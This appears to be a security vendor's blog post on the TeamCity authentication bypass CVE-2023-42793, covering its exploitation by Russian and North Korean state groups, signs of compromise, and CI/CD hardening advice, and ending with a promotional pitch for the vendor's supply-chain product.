On September 19, 2023, JetBrains disclosed CVE-2023-42793, a critical authentication bypass vulnerability in TeamCity, their CI/CD build management server. The vulnerability allowed an unauthenticated attacker to access the TeamCity server and gain administrative control. Within weeks, multiple threat actors, including state-sponsored groups attributed to Russia and North Korea, were exploiting the vulnerability to compromise build environments and execute supply chain attacks.
The TeamCity vulnerability was particularly alarming because it directly targeted CI/CD infrastructure. A compromised build server isn't just another breached system. It's a machine that has the access and authority to modify every piece of software it builds. In the wake of SolarWinds, the software industry was acutely aware of what happens when build infrastructure is compromised.
The Vulnerability
CVE-2023-42793 was an authentication bypass in TeamCity's web interface. A specific URL path could be accessed without authentication, allowing an attacker to create a new administrator account on the TeamCity server. Once an admin account was created, the attacker had full control of the build server, including access to all build configurations and their secrets, the ability to modify build pipelines to inject malicious code, access to deployment credentials stored in TeamCity, the ability to create new builds and deploy modified software, and access to source code for all connected repositories.
The vulnerability affected TeamCity versions before 2023.05.4. It was simple to exploit, requiring only a single HTTP request to create an admin account. No special tools, no complex chains, no credentials needed.
State-Sponsored Exploitation
The exploitation of CVE-2023-42793 by state-sponsored groups elevated it from a critical vulnerability to a national security concern.
Russian intelligence services. In December 2023, CISA, the FBI, NSA, and international partners published a joint advisory attributing exploitation of CVE-2023-42793 to SVR (Russia's Foreign Intelligence Service), the same group behind the SolarWinds attack. The advisory stated that SVR actors had been exploiting the vulnerability since September 2023 to gain access to victim networks. The SVR's interest in TeamCity was consistent with their SolarWinds playbook: compromise build infrastructure to enable supply chain attacks.
North Korean groups. Microsoft reported that two North Korean threat groups, Diamond Sleet and Onyx Sleet, were exploiting CVE-2023-42793. Diamond Sleet deployed a backdoor after creating rogue admin accounts on compromised TeamCity instances. Onyx Sleet used the access for reconnaissance and lateral movement.
The involvement of multiple state-sponsored groups underscored the strategic value of build infrastructure. Nation-state actors recognized that compromising a build server provided leverage far beyond the immediate target: it offered the potential to compromise every customer of the software built on that server.
Why Build Servers Are Crown Jewels
CI/CD servers like TeamCity sit at the center of the software delivery pipeline. Their compromise enables a uniquely dangerous class of attack.
Code injection at scale. A compromised build server can inject malicious code into every build it processes. If the server builds production software, the attacker can modify the software before it's shipped to customers. This is exactly the SolarWinds attack pattern.
Credential harvesting. Build servers store credentials for source repositories, artifact registries, cloud providers, deployment targets, and various integrations. These credentials are often highly privileged, with access to production environments and sensitive systems.
Source code access. Build servers have read access (and sometimes write access) to all connected source repositories. An attacker on the build server can exfiltrate source code, understand the target's architecture, and identify additional vulnerabilities.
Trust position. Organizations trust their build output. If the build server says a binary passed all checks and was built from the correct source code, deployment pipelines proceed. A compromised build server can produce malicious artifacts that pass all verification because the verification itself is compromised.
Stealth. Build servers are noisy by nature. They constantly create processes, download dependencies, run tests, and generate artifacts. Malicious activity on a build server blends into this noise, making detection difficult.
The Patching Challenge
JetBrains released a patch promptly, and also released a security plugin for organizations that couldn't immediately upgrade. However, the usual challenges applied.
Many organizations run self-hosted TeamCity instances that require manual updates. The update process involves downtime, which requires scheduling during maintenance windows. Large organizations may have multiple TeamCity instances, some managed by IT, some by individual development teams, and some running in cloud environments.
Additionally, patching the vulnerability doesn't remediate compromises that occurred before the patch. Organizations needed to audit their TeamCity instances for indicators of compromise: unauthorized admin accounts, modified build configurations, and unexpected plugin installations.
Detecting Compromise
Signs of CVE-2023-42793 exploitation included new administrator accounts created through the vulnerable endpoint, modified build configurations that include unexpected steps, new TeamCity plugins installed without authorization, unusual network connections from the TeamCity server, and changes to source code repository hooks or triggers.
JetBrains published guidance for investigating potential compromises. The most important step was checking for unauthorized user accounts created through the exploit endpoint. If an unauthorized admin account existed, the TeamCity instance should be considered compromised, and all credentials stored in or accessible through TeamCity should be rotated.
Lessons for CI/CD Security
Treat build servers as critical infrastructure. Apply the same security rigor to CI/CD servers as you do to production systems. This means network segmentation, access controls, patching, monitoring, and incident response planning.
Minimize stored credentials. Use short-lived, scoped credentials instead of long-lived secrets stored in the build server. Integrate with secrets managers that provide just-in-time credential access.
Restrict network access. Build servers should not be accessible from the internet. If remote access is required, use VPN or zero-trust network access solutions.
Monitor build integrity. Implement verification that build outputs match expected baselines. Track build step modifications and alert on unauthorized changes.
Maintain SBOM for build infrastructure. Know exactly what software your build servers run, so you can respond immediately when vulnerabilities like CVE-2023-42793 are disclosed.
How Safeguard.sh Helps
Safeguard.sh provides an independent security layer that doesn't depend on the integrity of your build infrastructure. When your build server itself becomes the attack vector, you need verification that operates outside the compromised trust boundary. Our platform's SBOM generation, vulnerability scanning, and policy gates provide that external verification, catching the kind of supply chain modifications that a compromised build server would introduce. Continuous monitoring ensures that your software's composition is tracked independently of your CI/CD pipeline, so a build server compromise doesn't silently propagate through your supply chain.